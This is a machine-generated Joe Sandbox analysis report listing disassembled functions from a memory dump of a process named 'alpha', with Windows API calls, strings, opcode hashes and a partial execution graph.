                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleMode_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 1606018815-0
                                                      • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                      • Instruction ID: 30f8c1e0b5b06d5ad0a2cf184225881abd714b78e80bb3611b4bd5cb7713cf61
                                                      • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                      • Instruction Fuzzy Hash: D8F01C36A24A42DBD708AB11E445279FA60FB8AB03F84A275DA0B42394DF7CD0098B11
                                                      Function 00007FF7E1DE10D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                        • Part of subcall function 00007FF7E1DBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
                                                      • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7E1DD827A), ref: 00007FF7E1DE11DC
                                                      • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7E1DD827A), ref: 00007FF7E1DE1277
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcessmemmovewcschr
                                                      • String ID: &()[]{}^=;!%'+,`~
                                                      • API String ID: 1135967885-381716982
                                                      • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                      • Instruction ID: 76d0ec533deeca2c78b9c57c0084b6da1bcb1a30bbfb05c67ab3dde323630600
                                                      • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                      • Instruction Fuzzy Hash: 9271E8B1E0824286D764EF15A48277AF6A0FB58799FC08237C94DC3B94CFBCE5558B12
                                                      Function 00007FF7E1DBE420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06D6
                                                        • Part of subcall function 00007FF7E1DC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06F0
                                                        • Part of subcall function 00007FF7E1DC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC074D
                                                        • Part of subcall function 00007FF7E1DC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC0762
                                                        • Part of subcall function 00007FF7E1DBEF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7E1DBE626,?,?,00000000,00007FF7E1DC1F69), ref: 00007FF7E1DBF000
                                                        • Part of subcall function 00007FF7E1DBEF40: wcschr.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF031
                                                        • Part of subcall function 00007FF7E1DBEF40: iswdigit.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF0D6
                                                      • longjmp.MSVCRT ref: 00007FF7E1DCCCBC
                                                      • longjmp.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DCCCE0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                      • String ID: GeToken: (%x) '%s'
                                                      • API String ID: 3282654869-1994581435
                                                      • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                      • Instruction ID: e0be0b9d921e7c804d1516fc43eda6b6803a4ed953c19a68e4c7bdccdb5e752f
                                                      • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                      • Instruction Fuzzy Hash: 1061FF71A0964292FB14EB219452779E3E4AF447A4FD84A36CA1E077E4EEBCF440C362
                                                      Function 00007FF7E1DE08EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memmovewcsncmp
                                                      • String ID: 0123456789
                                                      • API String ID: 3879766669-2793719750
                                                      • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                      • Instruction ID: c400f9e57a7885dae6a9f656c2a12c6c4cb795ccdd1d112eeda0b8ffedd0689e
                                                      • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                      • Instruction Fuzzy Hash: 0441B622F1868E85EB29EF2598027BEB254FB44B81F949232DE4E87784DF7CD541C391
                                                      Function 00007FF7E1DD9784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DD97D0
                                                        • Part of subcall function 00007FF7E1DBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD46E
                                                        • Part of subcall function 00007FF7E1DBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD485
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD4EE
                                                        • Part of subcall function 00007FF7E1DBD3F0: iswspace.MSVCRT ref: 00007FF7E1DBD54D
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD569
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD58C
                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DD98D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                      • String ID: Software\Classes
                                                      • API String ID: 2714550308-1656466771
                                                      • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                      • Instruction ID: 7d6844fbf5e46a29ed5c686c3e7fbf3e0ba54c8f7b3fe6d1154a02658b931729
                                                      • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                      • Instruction Fuzzy Hash: C641A122A09752D1EB08EB16D447639A3A4FB44BD0F908232DA5E437E1DFBED846C351
                                                      Function 00007FF7E1DDA0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDA0FC
                                                        • Part of subcall function 00007FF7E1DBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD46E
                                                        • Part of subcall function 00007FF7E1DBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD485
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD4EE
                                                        • Part of subcall function 00007FF7E1DBD3F0: iswspace.MSVCRT ref: 00007FF7E1DBD54D
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD569
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD58C
                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDA1FB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                      • String ID: Software\Classes
                                                      • API String ID: 2714550308-1656466771
                                                      • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                      • Instruction ID: 0cdf16e2702bf4476457e81c190f198764873517e9d7ff200c2e9970eafac050
                                                      • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                      • Instruction Fuzzy Hash: 7A41C122A09B5291EB04EB25D446679A3A4FB447D0FD0C332DA5E437E1DFB9E846C351
                                                      Function 00007FF7E1DBCAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleTitle
                                                      • String ID: -
                                                      • API String ID: 3358957663-3695764949
                                                      • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                      • Instruction ID: 0cd3a84456ac453b714a8d37487b883b83d13ff4d6a8d57bb64b35d5efe4401e
                                                      • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                      • Instruction Fuzzy Hash: 7B31BE21A0874296EB04FB11A802778EAA4FF49B90FD84536CE1E077D5DFBCE451C766
                                                      Function 00007FF7E1DC7280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsnicmpswscanf
                                                      • String ID: :EOF
                                                      • API String ID: 1534968528-551370653
                                                      • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                      • Instruction ID: 2d01179304bbf9fa4548cb77de255d9e64bba176bb420da9d8aa8353f27c9f5a
                                                      • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                      • Instruction Fuzzy Hash: E8319431E0864286FB14FB15A4423B8F6A0EF48B60FC48933DA5D46295DFBCE851C7A2
                                                      Function 00007FF7E1DB3BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsnicmp
                                                      • String ID: /-Y
                                                      • API String ID: 1886669725-4274875248
                                                      • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                      • Instruction ID: 6318832a31ea5ecd237e8f84e8098e125a8c6a2dd529bcada0428324844fc794
                                                      • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                      • Instruction Fuzzy Hash: BD216D66E08655A1EB14EB429442778B6A1FB44FC0F848032DE8A47794DEBCE492E322
                                                      Function 00007FF7E1DBB62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 3$3
                                                      • API String ID: 0-2538865259
                                                      • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                      • Instruction ID: 15e4e2377db0bf05f138cde5718331c6110736e0716ade626e9b2591930cdf23
                                                      • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                      • Instruction Fuzzy Hash: 69018BB0D0A582AAF708FB20A882774F620BF49315FD40537C40F055A5CFBC69A4C663
                                                      Function 00007FF7E1DC06C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06D6
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06F0
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC074D
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC0762
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                      • Instruction ID: 8e685b6937952020c12e089b69927045cdd6f5b4d7e893a82159c8c06c237c6e
                                                      • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                      • Instruction Fuzzy Hash: 43416D75A0964686EB18EB10E44227EF7A0FF49B40FD48436C64D03794DFBCA550CBA1

                                                      Execution Graph

                                                      Execution Coverage:5.7%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:1150
                                                      Total number of Limit Nodes:32
                                                      execution_graph 16798 7ff7e1dd9900 16803 7ff7e1dbff70 16798->16803 16801 7ff7e1dbff70 2 API calls 16802 7ff7e1dd991b 16801->16802 16804 7ff7e1dbff7c 16803->16804 16805 7ff7e1dbffdb 16803->16805 16804->16805 16806 7ff7e1dbffb5 GetProcessHeap RtlFreeHeap 16804->16806 16805->16801 16806->16805 17929 7ff7e1db6be0 17930 7ff7e1dbcd90 166 API calls 17929->17930 17931 7ff7e1db6c04 17930->17931 17932 7ff7e1db6c13 _pipe 17931->17932 17933 7ff7e1dd41a2 17931->17933 17934 7ff7e1db6e26 17932->17934 17938 7ff7e1db6c32 17932->17938 17936 7ff7e1db3278 166 API calls 17933->17936 17935 7ff7e1db3278 166 API calls 17934->17935 17935->17933 17937 7ff7e1dd41bc 17936->17937 17939 7ff7e1dde91c 198 API calls 17937->17939 17940 7ff7e1db6df1 17938->17940 17980 7ff7e1dbaffc _dup 17938->17980 17941 7ff7e1dd41c1 17939->17941 17944 7ff7e1db3278 166 API calls 17941->17944 17943 7ff7e1db6c7d 17943->17933 17946 7ff7e1dbb038 _dup2 17943->17946 17945 7ff7e1dd41d2 17944->17945 17947 7ff7e1dde91c 198 API calls 17945->17947 17948 7ff7e1db6c93 17946->17948 17949 7ff7e1dd41d7 17947->17949 17948->17949 17951 7ff7e1dbd208 _close 17948->17951 17950 7ff7e1db3278 166 API calls 17949->17950 17952 7ff7e1dd41e4 17950->17952 17953 7ff7e1db6ca4 17951->17953 17954 7ff7e1dde91c 198 API calls 17952->17954 17982 7ff7e1dbbe00 17953->17982 17955 7ff7e1dd41e9 17954->17955 17958 7ff7e1db6ccf _get_osfhandle DuplicateHandle 17959 7ff7e1db6d07 17958->17959 17960 7ff7e1dbb038 _dup2 17959->17960 17961 7ff7e1db6d11 17960->17961 17961->17949 17962 7ff7e1dbd208 _close 17961->17962 17963 7ff7e1db6d22 17962->17963 17964 7ff7e1db6e21 17963->17964 17966 7ff7e1dbaffc _dup 17963->17966 17965 7ff7e1dde91c 198 API calls 17964->17965 17965->17934 17967 7ff7e1db6d57 17966->17967 17967->17941 17968 7ff7e1dbb038 _dup2 17967->17968 17969 7ff7e1db6d6c 17968->17969 17969->17949 17970 7ff7e1dbd208 _close 17969->17970 17971 7ff7e1db6d7c 17970->17971 17972 7ff7e1dbbe00 647 API calls 17971->17972 17973 7ff7e1db6d9c 17972->17973 17974 7ff7e1dbb038 _dup2 17973->17974 17975 7ff7e1db6da8 17974->17975 17975->17949 17976 7ff7e1dbd208 _close 17975->17976 17977 7ff7e1db6db9 17976->17977 17977->17964 17978 7ff7e1db6dc1 17977->17978 17978->17940 18016 7ff7e1db6e60 17978->18016 17981 7ff7e1dbb018 17980->17981 17981->17943 17983 7ff7e1dbbe1b 17982->17983 17994 7ff7e1db6cc4 17982->17994 17984 7ff7e1dbbe47 memset 17983->17984 17989 7ff7e1dbbe67 17983->17989 17983->17994 18092 7ff7e1dbbff0 17984->18092 17986 7ff7e1dbbe92 17999 7ff7e1dbbea1 17986->17999 18020 7ff7e1dbc620 GetConsoleTitleW 17986->18020 17987 7ff7e1dbbe73 17987->17986 17992 7ff7e1dbbf0c 17987->17992 17988 7ff7e1dbbf29 17991 7ff7e1dbcd90 166 API calls 17988->17991 17989->17987 17989->17988 17990 7ff7e1dbbeaf 17989->17990 17990->17994 17997 7ff7e1dbbff0 185 API calls 17990->17997 17995 7ff7e1dbbf33 17991->17995 18130 7ff7e1dbb0d8 memset 17992->18130 17994->17958 17994->17959 17995->17990 18000 7ff7e1dbbf70 17995->18000 18190 7ff7e1db88a8 17995->18190 17997->17994 17999->17990 18005 7ff7e1dbaf98 2 API calls 17999->18005 18010 7ff7e1dbbf75 18000->18010 18247 7ff7e1db71ec 18000->18247 18001 7ff7e1dbbf1e 18001->17990 18005->17990 18006 7ff7e1dbbfa9 18006->17990 18008 7ff7e1dbcd90 166 API calls 18006->18008 18009 7ff7e1dbbfbb 18008->18009 18009->17990 18011 7ff7e1dc081c 166 API calls 18009->18011 18012 7ff7e1dbb0d8 194 API calls 18010->18012 18011->18010 18013 7ff7e1dbbf7f 18012->18013 18013->17990 18063 7ff7e1dc5ad8 18013->18063 18018 7ff7e1db6e6d 18016->18018 18017 7ff7e1db6eb9 18017->17940 18018->18017 18019 7ff7e1dc5cb4 7 API calls 18018->18019 18019->18018 18021 7ff7e1dbca2f 18020->18021 18023 7ff7e1dbc675 18020->18023 18022 7ff7e1dcc5fc GetLastError 18021->18022 18025 7ff7e1db3278 166 API calls 18021->18025 18026 7ff7e1dc855c ??_V@YAXPEAX 18021->18026 18022->18021 18024 7ff7e1dbca40 17 API calls 18023->18024 18034 7ff7e1dbc69b 18024->18034 18025->18021 18026->18021 18027 7ff7e1dc291c 8 API calls 18035 7ff7e1dbc762 18027->18035 18028 7ff7e1dbc9b5 18031 7ff7e1dc855c ??_V@YAXPEAX 18028->18031 18029 7ff7e1db89c0 23 API 